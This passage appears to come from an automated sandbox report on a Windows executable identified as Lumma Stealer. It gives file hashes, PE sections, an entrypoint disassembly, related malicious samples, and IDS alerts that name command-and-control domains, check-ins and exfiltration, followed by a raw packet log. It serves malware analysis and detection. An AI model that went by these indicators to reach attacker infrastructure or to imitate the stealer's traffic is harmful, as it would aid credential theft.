                                                                                                                                                                                                                                0c8cY5GOMh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                tFDKSN3TdH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                ghumRvJGY9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                                CLOUDFLARENETUSjT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                0c8cY5GOMh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 104.21.6.3
                                                                                                                                                                                                                                z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                • 172.67.165.185
                                                                                                                                                                                                                                4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 172.67.157.254

                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1M7uF55qihK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                jT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                pTM2NWuTvC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                DjnwNMDQhC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                0c8cY5GOMh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                tFDKSN3TdH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                ghumRvJGY9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                • 104.102.49.254

                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                No created / dropped files found

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):7.948476636577372
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                File name:MaZjv5XeQi.exe
                                                                                                                                                                                                                                File size:1'847'808 bytes
                                                                                                                                                                                                                                MD5:20460f73ddd6da12a34a1bc6911b0538
                                                                                                                                                                                                                                SHA1:643fdda94defd6dc666e446dac08887c6799d9ef
                                                                                                                                                                                                                                SHA256:c25a7ddb2f76edf74c0174c631be03fca999cc3052e47f7a47ea41dc92657780
                                                                                                                                                                                                                                SHA512:6c92c7115c5e0e5f5b736458fd021374b9d7eae9b233d1e6a7c51c0542be780b168a5cb19865be3d5ae0f35ccdcaa21f50fccf9d87ef43f825aa85b493358034
                                                                                                                                                                                                                                SSDEEP:49152:DkKqj8OXX8pBwwFzkOFIH8SQn+BY2qWIfa:aQ487TFzkOFY8r+agI
                                                                                                                                                                                                                                TLSH:E68533311E14097DC2EEE5767893EEC7FF619C0EE7848465272E4BA985A7F84E039B40
                                                                                                                                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................H...........@...........................I...........@.................................Y@..m..

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Entrypoint:0x88d000
                                                                                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                jmp 00007FEB1CAC2DCAh
                                                                                                                                                                                                                                movups xmm3, dqword ptr [eax+eax]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                jmp 00007FEB1CAC4DC5h
                                                                                                                                                                                                                                add byte ptr [edx], al
                                                                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], dh
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [edi], bl
                                                                                                                                                                                                                                add byte ptr [eax+000000FEh], ah
                                                                                                                                                                                                                                add byte ptr [edx], ah
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], cl
                                                                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add eax, 0000000Ah
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], dl
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add ecx, dword ptr [edx]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                xor byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [edx], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add eax, 0000000Ah
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], dh
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [edx], cl
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                0x10000x520000x264001f30e7a8639eadc725c7aca2c93ec44cFalse0.9995021446078431data7.977266846622565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                0x550000x29d0000x2006a6da0fd3d2ca1fb8e8eadb4e3ce4d01unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                buspngqz0x2f20000x19a0000x199200d72b5c3f894e75cbe4e6c9269d24e536False0.9949199654369081data7.953319540828306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                rkbtqtfk0x48c0000x10000x400a881862b0b90a1b667915d9d91b7314cFalse0.83203125data6.3751466816085145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                .taggant0x48d0000x30000x220010c7fc67d48e24d0c773dd869d5aaaf3False0.08823529411764706DOS executable (COM)1.165461070240526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                kernel32.dlllstrcpy

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                2024-12-26T13:14:12.257087+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.5495901.1.1.153UDP
                                                                                                                                                                                                                                2024-12-26T13:14:12.397561+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.5599381.1.1.153UDP
                                                                                                                                                                                                                                2024-12-26T13:14:12.539037+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.5497931.1.1.153UDP
                                                                                                                                                                                                                                2024-12-26T13:14:12.679082+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.5562611.1.1.153UDP
                                                                                                                                                                                                                                2024-12-26T13:14:12.820808+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.5569811.1.1.153UDP
                                                                                                                                                                                                                                2024-12-26T13:14:12.962681+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.5619841.1.1.153UDP
                                                                                                                                                                                                                                2024-12-26T13:14:13.124075+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.5589931.1.1.153UDP
                                                                                                                                                                                                                                2024-12-26T13:14:13.293004+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.5633611.1.1.153UDP
                                                                                                                                                                                                                                2024-12-26T13:14:15.113927+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.102.49.254443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:15.913923+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549704104.102.49.254443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:17.635550+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:18.418371+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:18.418371+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:19.766992+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:20.561905+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:20.561905+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:22.341952+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:24.656109+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:25.521287+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:27.144452+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.66.86443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:29.988082+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.157.254443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:30.758464+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549712172.67.157.254443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:32.833657+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715172.67.157.254443TCP
                                                                                                                                                                                                                                2024-12-26T13:14:36.082596+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549728172.67.157.254443TCP

                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.633320093 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.633426905 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.633527994 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.636609077 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.636645079 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.113781929 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.113926888 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.119019032 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.119051933 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.119353056 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.159810066 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.172383070 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.215349913 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.913963079 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.913986921 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.914026022 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.914040089 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.914067984 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.914068937 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.914140940 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.914186001 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.914186001 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:15.914216042 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.137034893 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.137048960 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.137098074 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.137197018 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.137264013 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.137299061 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.137337923 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.142940998 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.143021107 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.143049002 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.143095016 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.181047916 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.181102037 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.181119919 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.181128025 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.326878071 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.326948881 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.327066898 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.328233004 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.328249931 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.635299921 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.635550022 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.638588905 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.638621092 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.638830900 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.640213966 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.640249014 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.640284061 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.418374062 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.418473959 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.418636084 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.429383039 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.429419994 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.429439068 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.429446936 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.461863041 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.461926937 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.462022066 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.462331057 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.462346077 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.766815901 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.766992092 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.768480062 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.768490076 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.768692017 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.770092964 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.770118952 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.770153046 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.561943054 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562089920 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562143087 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562170982 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562263012 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562314034 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562319040 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562485933 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562525034 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562530041 CET44349706104.21.66.86192.168.2.5
